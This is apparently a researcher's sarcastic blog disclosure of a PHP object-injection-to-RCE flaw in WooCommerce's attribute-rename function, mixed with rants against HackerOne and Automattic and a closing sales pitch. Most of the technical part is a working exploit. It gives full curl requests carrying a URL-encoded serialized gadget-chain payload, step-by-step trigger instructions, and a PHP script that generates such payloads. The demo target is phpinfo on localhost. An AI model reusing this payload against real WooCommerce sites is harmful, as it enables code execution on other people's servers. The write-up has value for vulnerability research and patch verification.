WooCommerce and Azis with scotch

Most of the topics here are WordPress related and written with heavy sarcasm, as that is the only way to reach the ones who need to read and understand, instead of watching themselves in the mirror repeating how beautiful they are. Those people (I mean WP puppets who never miss a chance to compliment their boss on having the biggest one) need to move their reference point away from the one given by “Azis” after a bottle of “scotch”.

Azis under scotch, rdy!

Now let's focus on the technical part, the RCE issue in the current version of WooCommerce. After that I'll explain why this is again being disclosed this way, and who Azis the scotch lover is.

Issue

As you all know, since H1 as a bug bounty platform steals from researchers on orders from their JE shit machine, I decided to stay away from H1 until they put their “self-proclaimed king of bug bounty” under control. That is why I contacted the “lovely” people at Automattic via email and handed them the issue: unserialization of attacker-controlled data (PHP object injection) that results in RCE in WooCommerce.

The issue exists in the function wc_create_attribute and is caused by rewriting bytes inside a string (the serialized _product_attributes array, in our case) outside of PHP's serialize / unserialize routines. When a taxonomy attribute's slug is renamed, the code below runs a SQL REPLACE() that swaps the token s:N:"pa_old" for s:M:"pa_new" everywhere in meta_value, including inside attribute values the user typed, while the length prefix of the string that contains those bytes is never updated.

--------------------
// wc_create_attribute(): on rename, the old slug token is swapped for the new one
// inside every product's serialized meta_value, byte for byte, without re-serializing.
$wpdb->query(
	$wpdb->prepare(
		"UPDATE {$wpdb->postmeta} SET meta_value = REPLACE( meta_value, %s, %s ) WHERE meta_key = '_product_attributes'",
		's:' . $old_attribute_name_length . ':"pa_' . $args['old_slug'] . '"',
		's:' . $attribute_name_length . ':"pa_' . $data['attribute_name'] . '"'
	)
);
--------------------

The technique for placing a payload into serialized output that is manipulated outside of PHP's serialize / unserialize functions is described here and has many use cases / 0days (not all of them disclosed). The core of it: every REPLACE() that changes the byte length of a token also moves the real end of any enclosing s:N:"…" string whose N is left untouched, so unserialize() closes that string early and parses the bytes that follow, which the attacker chose, as new keys, values and objects.

Fix

Suddenly, two weeks later, a developer showed up in my inbox and told me that a fix had been deployed and credits had been given.

Why this happened

I was full of questions: why wasn't I asked for credit information, and why wasn't I asked to check the “solution”?! I know the answer, I got it! When I reported the issue, some Barry over there wasn't too worried about the issue, but told me that they couldn't give me a bounty because I don't use H1. I told him to focus on the problem and leave the “bounty” thing for the end of the process… That was the last contact, and then the “fix” showed up… The H1 platform puts all of those program managers into some sort of authority mode, knowing they can hold researchers hostage over some shitty bounties and do whatever they want… No, my friends .!.

Vulnerability

As I stated before, the wc_create_attribute function is the vulnerable one. The following guide to exploiting it will give you an idea of what this vulnerability is about, if you don't already know. On your local WooCommerce setup:

  1. In /wp-admin/edit.php?post_type=product&page=product_attributes create an attribute with both name and slug set to woo.
  2. Create a demo product (a simple, virtual one in my case) and save it.
  3. Add a custom attribute test with the value payload and capture the request. It will look something like this:
curl 'http://localhost/wpm/wcwp/wp-admin/admin-ajax.php' -H 'Cookie: wordpress_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7C4b8e2ff115b842870275a29e130279a35fc4a8880be9df869c4d0c65a8b6865e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7Cfe2b2f68b3d71bd4e9f60c5c6e0d2232605d43e5eaedad160193a1c423e656b9; wp-settings-time-1=1539119916; __ar_v4=DCRDZA4OZJCETF5N5YL5SU%3A20180321%3A4%7CZAMJKSSZRREUVAYSLZ2K6S%3A20180321%3A4%7CQQBLQGEK7FB4RBKP6CVHTS%3A20180321%3A4; _wpfuuid=3bc2a390-6279-4d85-8a89-3309ccd1f201' -H 'Origin: http://localhost' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Referer: http://localhost/wpm/wcwp/wp-admin/post.php?post=10&action=edit' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' --data 'post_id=10&product_type=simple&data=attribute_names%255B0%255D%3Dtest%26attribute_position%255B0%255D%3D0%26attribute_values%255B0%255D%3Dpayload%26attribute_visibility%255B0%255D%3D1&action=woocommerce_save_attributes&security=70d4636c87' --compressed

4. Replace the payload with the following string (URL-encoded; the repeated s:6:"pa_woo" tokens are what the REPLACE() will expand, and the tail after them is what unserialize() will read once the value string closes early):

s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22%22%3Bs%3A10%3A%22is_visible%22%3Bi%3A1%3Bs%3A12%3A%22is_variation%22%3Bi%3A0%3Bs%3A11%3A%22is_taxonomy%22%3Bi%3A0%3Bs%3A3%3A%22boo%22%3BO%3A19%3A%22WC_Log_Handler_File%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handles%22%3BC%3A33%3A%22Requests_Utility_FilteredIterator%22%3A82%3A%7Bx%3Ai%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22azisY%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7D%7D%7D%7D

The request then becomes:

curl 'http://localhost/wpm/wcwp/wp-admin/admin-ajax.php' -H 'Cookie: wordpress_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7C4b8e2ff115b842870275a29e130279a35fc4a8880be9df869c4d0c65a8b6865e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7Cfe2b2f68b3d71bd4e9f60c5c6e0d2232605d43e5eaedad160193a1c423e656b9; wp-settings-time-1=1539119916; __ar_v4=DCRDZA4OZJCETF5N5YL5SU%3A20180321%3A4%7CZAMJKSSZRREUVAYSLZ2K6S%3A20180321%3A4%7CQQBLQGEK7FB4RBKP6CVHTS%3A20180321%3A4; _wpfuuid=3bc2a390-6279-4d85-8a89-3309ccd1f201' -H 'Origin: http://localhost' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Referer: http://localhost/wpm/wcwp/wp-admin/post.php?post=10&action=edit' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' --data 'post_id=10&product_type=simple&data=attribute_names%255B0%255D%3Dtest%26attribute_position%255B0%255D%3D0%26attribute_values%255B0%255D%3Ds%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22%22%3Bs%3A10%3A%22is_visible%22%3Bi%3A1%3Bs%3A12%3A%22is_variation%22%3Bi%3A0%3Bs%3A11%3A%22is_taxonomy%22%3Bi%3A0%3Bs%3A3%3A%22boo%22%3BO%3A19%3A%22WC_Log_Handler_File%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handles%22%3BC%3A33%3A%22Requests_Utility_FilteredIterator%22%3A82%3A%7Bx%3Ai%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22azisY%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7D%7D%7D%7D%26attribute_visibility%255B0%255D%3D1&action=woocommerce_save_attributes&security=70d4636c87' --compressed

5. Go to /wp-admin/edit.php?post_type=product&page=product_attributes, edit the attribute and change both its name and slug from woo to azisftw, then save. This triggers the REPLACE() above on every product's _product_attributes row.

6. Visit the product page (/product/azis-demo-product/ in my case): the stored meta is unserialized, the smuggled WC_Log_Handler_File object is instantiated, and the phpinfo() output from the payload's callback appears on the page.

7. Yes, this is RCE. Rename the attribute and slug back to woo and continue using the store.
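To make the length desync behind the code at the top and the steps above concrete, here is an added PHP example. It is my code, not WooCommerce's or the author's: it emulates the SQL REPLACE() with str_replace on a _product_attributes array built directly with serialize(), so whatever sanitisation WooCommerce's own save path applies is out of the picture. Gadget, slug_token, vulnerable_rename, safe_rename and build_payload are hypothetical names introduced here; the Gadget class stands in for the real chain, which in the PoC payload is a WC_Log_Handler_File whose protected handles property holds a Requests_Utility_FilteredIterator with callback phpinfo. safe_rename shows one correct approach (parse, edit, re-serialize) and makes no claim about what WooCommerce actually shipped.

```php
<?php
// Added example, not WooCommerce code. Models the wc_create_attribute slug
// rename two ways: the vulnerable SQL REPLACE() on the serialized
// _product_attributes string (emulated with str_replace) and a safe
// unserialize / edit / serialize round trip. Gadget is a hypothetical
// stand-in for the real gadget chain (the PoC used WC_Log_Handler_File).

class Gadget {
    public $cmd = 'id';
    public function __wakeup() {
        // Side effect fires the moment unserialize() revives the object.
        echo "[!] Gadget::__wakeup() reached, cmd={$this->cmd}\n";
    }
}

// The token WooCommerce searches for / replaces: s:<len>:"pa_<slug>"
function slug_token(string $slug): string {
    return 's:' . strlen('pa_' . $slug) . ':"pa_' . $slug . '"';
}

// Vulnerable: blind byte replacement, exactly what REPLACE(meta_value, %s, %s)
// does. Any s:N:"..." string that *contains* the token grows, but its N does not.
function vulnerable_rename(string $meta, string $oldSlug, string $newSlug): string {
    return str_replace(slug_token($oldSlug), slug_token($newSlug), $meta);
}

// Safe: parse first, rename in the data model, serialize again so every
// length prefix is recomputed. No object is instantiated during the parse.
function safe_rename(string $meta, string $oldSlug, string $newSlug): string {
    $attrs = unserialize($meta, ['allowed_classes' => false]);
    if (!is_array($attrs)) {
        return $meta;
    }
    $fixed = [];
    foreach ($attrs as $key => $attr) {
        if ($key === 'pa_' . $oldSlug) {
            $key = 'pa_' . $newSlug;
            $attr['name'] = $key;
        }
        $fixed[$key] = $attr;
    }
    return serialize($fixed);
}

// Attacker's attribute value. After the rename each old token gains $delta
// bytes, so the stale prefix of the enclosing "value" string now ends
// $repeats * $delta bytes before the real end. With $repeats * $delta ==
// strlen($tail) it ends exactly at the tail's opening quote, and $tail is
// parsed as structure: the four keys still owed to the a:6 inner array
// (so its element count matches), the object, and the closing braces.
function build_payload(string $oldSlug, string $newSlug, object $gadget): string {
    $delta = strlen(slug_token($newSlug)) - strlen(slug_token($oldSlug));
    if ($delta <= 0) {
        throw new InvalidArgumentException('new slug must be longer than the old one');
    }
    for ($n = 1; ; $n++) {                      // pad the last key until the tail fits
        $tail = '";'
            . serialize('is_visible') . serialize(1)
            . serialize('is_variation') . serialize(0)
            . serialize('is_taxonomy') . serialize(0)
            . serialize(str_repeat('x', $n)) . serialize($gadget)
            . '}}';
        if (strlen($tail) % $delta === 0) {
            break;
        }
    }
    return str_repeat(slug_token($oldSlug), intdiv(strlen($tail), $delta)) . $tail;
}

// Constructed _product_attributes meta: one taxonomy attribute pa_woo plus one
// custom attribute "test" whose value is the payload.
$meta = serialize([
    'pa_woo' => ['name' => 'pa_woo', 'value' => '', 'position' => 0,
                 'is_visible' => 1, 'is_variation' => 0, 'is_taxonomy' => 1],
    'test'   => ['name' => 'test', 'value' => build_payload('woo', 'azisftw', new Gadget()),
                 'position' => 1, 'is_visible' => 1, 'is_variation' => 0, 'is_taxonomy' => 0],
]);

// Vulnerable path: the admin renames woo -> azisftw, the payload is revived.
// (PHP >= 8.3 additionally warns about the trailing bytes left after the early close.)
$tampered = @unserialize(vulnerable_rename($meta, 'woo', 'azisftw'));
$revived  = array_filter($tampered['test'], fn ($v) => $v instanceof Gadget);
echo 'vulnerable path: ' . count($revived) . " attacker object(s) instantiated\n";

// Safe path: key renamed, payload remains an inert string.
$clean = unserialize(safe_rename($meta, 'woo', 'azisftw'), ['allowed_classes' => false]);
echo 'safe path: pa_azisftw ' . (isset($clean['pa_azisftw']) ? 'present' : 'missing')
   . ', test value is_string=' . var_export(is_string($clean['test']['value']), true) . "\n";
```

Run it with php on the command line: the vulnerable path prints the __wakeup line and reports one instantiated object, the safe path reports pa_azisftw present and the payload still a plain string. The desync works with any token whose replacement changes the byte length, which is why the fix has to be structural (re-serialize after editing) rather than a tweak to the REPLACE() arguments; unserialize's allowed_classes option is defense in depth on top of that, not a substitute, since the stale length still corrupts the attribute array.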

Attack surface

The attack surface is much bigger than this; the demo described in this write-up is just a PoC. Hint: look at the problematic query ;-)

Why disclosing this way

I wrote to the developer that the fix wasn't complete as soon as I saw the released version. Naturally, everyone there looked at me from the Azis-with-scotch perspective and went: we are not convinced by what you are talking about. After they were convinced, they were shown the path that Azis with scotch always forced and recommended, but as you can see they are comfortable discriminating against and underestimating people from that subjective point of view, yet not ready to apply those “solutions” in their products. I'm really sad to say this, but discrimination, supremacist behavior and underestimation of people based on their origin are the main attributes WP rockstars have, and these are passed on to their associates, causing a huge loss for everyone! Those attributes are only boosted by usage of the H1 platform, as I have already explained.

They sent Azis to interview candidates for an opera singer position

How do you think he will grade the opera singer?! Reference point, my friends!!!

WordPress Cracked

From a security standpoint, WordPress has been put in the hands of a few people who have nothing to do with security. They were put there and got the attitude, the same as the “mad king of bug bounty”, always protected by an “anti-soviet” super hero who doesn't get things clearly but is stronK. With this attitude they have fractured WordPress so hard that it is NOT USABLE except as a publishing platform for a single user. This is the first write-up in the series I announced, and it presents a WordPress vulnerability known to the WordPress security team but not announced to developers… As always…

Promo

If you are a WP developer, WP hosting provider or WP security product provider with a valuable list of clients, we offer a subscription list, and we are exceptional (B2B only).